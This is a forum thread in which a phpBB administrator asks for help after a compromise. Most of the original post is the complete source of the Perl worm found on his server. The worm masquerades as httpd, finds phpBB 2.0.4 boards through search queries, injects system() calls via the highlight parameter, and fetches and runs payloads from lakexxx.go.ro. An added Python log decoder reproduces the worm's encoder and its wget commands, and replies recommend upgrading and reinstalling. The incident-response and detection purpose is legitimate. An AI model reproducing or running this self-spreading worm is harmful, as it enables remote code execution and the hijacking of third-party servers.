Hacked - pls help

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

btfans
Forum Newbie
Posts: 22
Joined: Thu Jun 10, 2004 10:58 am

Hacked - pls help

Post by btfans »

feyd | Please use [code], [/code] and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read: Posting Code in the Forums (http://forums.devnetwork.net/viewtopic.php?t=21171) to learn how to do it too.



Dear All,

**** Please excuse me if this was NOT posted to the correct category ****

My phpBB (/var/www/html/phpBB2, running on FC3) wrongly allowed 777 and was attacked by this hacker
(ip=81.196.20.134).
/tmp/.666 and /tmp/.lick are invoked continuously, seemingly whenever phpBB runs.

This results in a substantial problem with sh (defunct) (zombie) processes.

I want expert advice:

1) How is it invoked?
2) How do I STOP it?
3) For now I only deny that IP access to /var/www/html using .htaccess.

Mathew


------------------- lick.txt -------------------------

[syntax="perl"]#### There is no patch for human stupidity ##### 
 ########### Romania ######################### 
    ###### Crash@WhiteHat.Cc ###### #
 
use strict; 
use IO::Socket; 
use IO::Handle; 
 
 
# Disguise the process: overwrite argv[0] (padded with NULs) so that
# ps/top show this Perl script as the Apache binary.
my $process = '/usr/sbin/httpd';  
$0="$process"."\0"x16; 
my $pid=fork; 
 
 
# Forward declarations. remote($) is declared but never defined in this file.
sub fetch(); 
sub remote($); 
sub http_query($); 
sub encode($); 
 
# Find targets by querying MSN search for phrases that identify phpBB
# viewtopic.php pages; the worm spreads via a search engine, not by
# scanning address ranges. Returns the list of URLs found on the result page.
sub fetch(){ 
    my $rnd=(int(rand(9999))); 
    my $s= (int(rand(1000))); 
    if ($rnd>1000) { $s= (int(rand(100)))} 
  
     
 
    my @str=( 
             "%22phpBB+2.0.4+%C2%A9+2001%2C+2002+%22", 
             "%22phpBB+2.0.4+%C2%A9+2001%2C+2002+%22+topic+777", 
             "viewtopic.php%3Ft", 
             "%22View+next+topic%22", 
             "%22View+previous+topic%22", 
             "viewtopic.php+%22Log+in+to+check+your+private+messages%22", 
             "%22Powered+by+phpBB%22+v-i-e-w-t-o-p-i-c-.-p-h-p", 
             "%22P-o-w-e-r-e-d+b-y+p-h-p-B-B%22", 
             "viewtopic.php+%22by+phpBB+2001%22", 
             "viewtopic.php+%22by+phpBB+2000%22", 
             "viewtopic.php+%22by+phpBB+2002%22", 
             "viewtopic.php+by+phpBB+2003%22", 
             "viewtopic.php+%22by+phpBB+2004%22", 
             "%22ALEKS+HACKED+YOUR+SYSTEM%22", 
             "viewtopic.php+%22by+phpBB+2005%22", 
             "viewtopic.php+%22by+phpBB+2006%22", 
             "intitle%3A%22%3A%3A+View+topic%22", 
             "viewtopic.php+%22+phpBB+Group%22", 
             "%22topic.php%3Ft%3D%22", 
             "%22%3A%3A+View+topic%22", 
 ); 
 
    # Random search term plus a random number and a random result offset,
    # so repeated runs do not keep hitting the same result page.
    my $query="search.msn.com/results.aspx?q="; 
    $query.=$str[(rand(scalar(@str)))].$rnd; 
    $query.="&first=$s"; 
 
    my @lst=(); 
    my $page = http_query($query); 
    # Collect every external link on the result page, skipping MSN's own.
    while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){ 
        if ($1 !~ m/msn|cache|hotmail/){ 
            push (@lst,$1); 
        } 
    } 
     
    return (@lst); 
} 
 
# Minimal HTTP/1.0 GET over a raw socket with a 10-second alarm timeout.
# Returns the whole response (headers and body) as one string, or "" on failure.
sub http_query($){ 
    my ($url) = @_; 
    my $host=$url; 
    my $query=$url; 
    my $page=""; 
    $host =~ s/href=\"?http:\/\///; 
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; 
    $query =~s/$host//; 
    if ($query eq "") {$query="/";}; 
    eval { 
        local $SIG{ALRM} = sub { die "1";}; 
        alarm 10; 
        my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; 
        print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n "; 
        my @r = <$sock>; 
        $page="@r"; 
        alarm 0; 
        close($sock); 
    };     
    return $page; 
 
} 
 
# Turn a shell command into chr(N)%252Echr(N)... so that the payload contains
# no quotes, spaces or slashes; %252E is a double-URL-encoded "." (PHP string
# concatenation once the target has decoded the parameter twice).
sub encode($) { 
    my $s = shift; 
    $s =~ s/(.)/"chr(".ord($1).")%252E"/seg; 
    $s =~ s/%252E$//; 
    return $s; 
} 
 
 
 
# Daemonize: the parent exits, the child keeps running in the background.
eval {fork and exit;}; 
 
my $iam=$ARGV[0]; 
my $oneday=time+3600;  # despite the name, the loop runs for one hour
my $page=""; 
my @urls; 
my $url; 
 
 
 
 
 
 
while(time<$oneday){ 
    @urls=fetch(); 
    foreach $url (@urls) { 
    if ($url !~ /viewtopic.php/) {next;} 
    # Keep only scheme-less host/path up to viewtopic.php?t=N or ?p=N
    # ([t|p] is a character class, so it also matches a literal "|").
    $url =~ s/(.*\/viewtopic.php\?[t|p]=[0-9]+).*/$1/; 
    # Probe: inject '.system(perl -e "print q(jSVowMsd)").' through the
    # highlight parameter and look for the marker string in the response.
    my $cmd=encode("perl -e \"print q(jSVowMsd)\""); 
    $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527"; 
    $page = http_query($url); 
    if ( $page =~ /jSVowMsd/ ){ 
        # Target executes commands: fetch this script as /tmp/.lick and run it,
        # then fetch the bot as /tmp/.666 and run it.
        $url =~ s/&highlight.*//; 
        my $upload=$url; 
        $upload =~ s/viewtopic.*//; 
        $cmd="wget http://lakexxx.go.ro/xpl.txt -O /tmp/.lick;perl /tmp/.lick";    # set cmd 
        $cmd=encode("$cmd");    # set cmd 
        $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527"; 
        $page = http_query($url); 
        $cmd="wget http://lakexxx.go.ro/bot.txt -O /tmp/.666;perl /tmp/.666;touch /tmp/.666";    
        $cmd=encode("$cmd");    # set cmd 
        $url =~ s/&highlight.*//; 
        $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527"; 
        $page = http_query($url); 
    } 
 
    } 
}

[/syntax]
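The script above reaches the server through the highlight parameter of viewtopic.php, encoding each byte of its shell command as chr(N) and wrapping it as a double-URL-encoded '.system(...).'. The following is an added example, not part of the original post and not phpBB's or the worm's own code: it reproduces that encoding, reverses it, and runs the check over a few constructed Apache access-log lines so that the injected commands (the jSVowMsd probe, then the wget of xpl.txt) can be read straight out of the log. The log lines, timestamps and function names are assumptions made for the example; the attacker IP and URLs are the ones given in the post.

```python
"""Decode the ``highlight`` payloads the posted worm injects into phpBB.

Added example, not part of the original post and not phpBB's or the worm's
own code. It reverses the worm's ``encode`` sub (every byte of the shell
command becomes ``chr(N)``, joined by ``%252E``, a twice-encoded dot, and
wrapped in ``%2527%252Esystem(...)%252E%2527``, i.e. ``'.system(...).'``
after two rounds of decoding) so the commands can be read back out of an
Apache access log. The log lines below are constructed for the example.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Apache common/combined log prefix: client, ident, user, [timestamp] "request" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The query parameter the worm abuses; its value runs up to &, whitespace or a quote.
HIGHLIGHT_RE = re.compile(r'[?&]highlight=([^&\s"]+)')
CHR_RE = re.compile(r"chr\((\d{1,3})\)")


def encode_like_worm(cmd: str) -> str:
    """Reproduce the worm's ``encode`` sub; used here only to build sample log lines."""
    body = "%252E".join(f"chr({ord(c)})" for c in cmd)
    return f"%2527%252Esystem({body})%252E%2527"


def decode_highlight(value: str) -> Optional[str]:
    """Return the shell command hidden in a highlight value, or None if none is found.

    The value is decoded twice because the worm double-encodes it, relying on
    the vulnerable phpBB decoding the parameter a second time itself before
    the '.system(...).' text is evaluated.
    """
    decoded = unquote(unquote(value))
    m = re.search(r"system\((.*)\)", decoded)
    if not m:
        return None
    codes = CHR_RE.findall(m.group(1))
    if not codes:
        return None
    return "".join(chr(int(c)) for c in codes)


def is_string_breakout(value: str) -> bool:
    """Heuristic: after double decoding, a single quote adjacent to a dot means
    the request is trying to leave the quoted string the target builds around
    the highlight words, whatever function follows the breakout."""
    decoded = unquote(unquote(value))
    return "'." in decoded or ".'" in decoded


def scan_access_log(lines) -> List[Tuple[str, str, int, Optional[str]]]:
    """Return (client_ip, timestamp, status, command) for every request whose
    highlight parameter looks injected. command is None when the breakout
    heuristic fired but the payload is not in the worm's chr() form."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        h = HIGHLIGHT_RE.search(m.group("path"))
        if not h:
            continue
        cmd = decode_highlight(h.group(1))
        if cmd is None and not is_string_breakout(h.group(1)):
            continue
        hits.append((m.group("ip"), m.group("ts"), int(m.group("status")), cmd))
    return hits


# Constructed sample: one ordinary search, then a hand-encoded "id", then the
# worm's probe and its first download-and-run command as they appear in the
# script. The client IP is the one reported in the post; timestamps are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2006:10:02:11 +0000] '
    '"GET /phpBB2/viewtopic.php?t=42&highlight=welcome HTTP/1.1" 200 8123',
    '81.196.20.134 - - [12/Jan/2006:10:03:40 +0000] '
    '"GET /phpBB2/viewtopic.php?t=42&highlight=%2527%252Esystem(chr(105)%252Echr(100))%252E%2527 HTTP/1.0" 200 8190',
    '81.196.20.134 - - [12/Jan/2006:10:03:41 +0000] '
    '"GET /phpBB2/viewtopic.php?t=42&highlight='
    + encode_like_worm('perl -e "print q(jSVowMsd)"') + ' HTTP/1.0" 200 8190',
    '81.196.20.134 - - [12/Jan/2006:10:03:42 +0000] '
    '"GET /phpBB2/viewtopic.php?t=42&highlight='
    + encode_like_worm("wget http://lakexxx.go.ro/xpl.txt -O /tmp/.lick;perl /tmp/.lick")
    + ' HTTP/1.0" 200 8190',
]

if __name__ == "__main__":
    for ip, ts, status, cmd in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} {status} -> {cmd!r}")
```

Run it against a real access_log by passing the file's lines to scan_access_log(); a 200 status on a probe line means the marker check in the worm likely succeeded, and the decoded command tells you which files to look for on disk.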
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

It would appear that this perl script is designed specifically for phpBB 2.0.4, a very old version of phpBB. I'd seriously suggest upgrading to the latest.

Other than that, I'd ask over at phpBB's support forums.
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

If you've been hacked, the best thing to do is perform a clean install and then attempt to import in the old data.
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

Search the phpBB community for 'site hacked'. You will find a lot of information on their site. They also offer quite a few suggestions for getting your board back online.

As Feyd suggested, you really should upgrade your board. The current version is 2.0.20 so yours is a little out of date. But before you update, dump your MySQL database to a file and backup whatever files that you can (especially if you modded your board). Then do whatever the phpBB docs or community say to do.
btfans
Forum Newbie
Posts: 22
Joined: Thu Jun 10, 2004 10:58 am

Post by btfans »

Finally removed phpBB 2.0.4 and reinstalled the new version. - FIXED.
Thank you all for help.